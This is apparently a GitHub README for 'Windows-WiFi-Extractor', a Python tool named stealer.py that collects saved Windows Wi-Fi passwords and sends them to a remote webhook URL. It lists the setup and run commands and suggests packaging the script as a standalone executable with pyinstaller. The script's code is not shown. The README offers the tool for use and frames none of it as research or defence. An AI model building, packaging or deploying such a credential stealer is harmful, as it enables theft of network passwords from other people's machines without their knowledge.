Skip to content

Latest commit

 

History

History
23 lines (17 loc) · 428 Bytes

README.md

File metadata and controls

23 lines (17 loc) · 428 Bytes

Windows-WiFi-Extractor

Extract Windows Wi-Fi Passwords to a Remote URL

Install

Before running, install the required modules:

pip3 install -r requirements.txt

Usage

To use, simply replace the url variable with your webhook and execute the following:

python stealer.py

Making an executable

If you want to be a fancy pants, you can convert this to an exe :)

pyinstaller --onefile stealer.py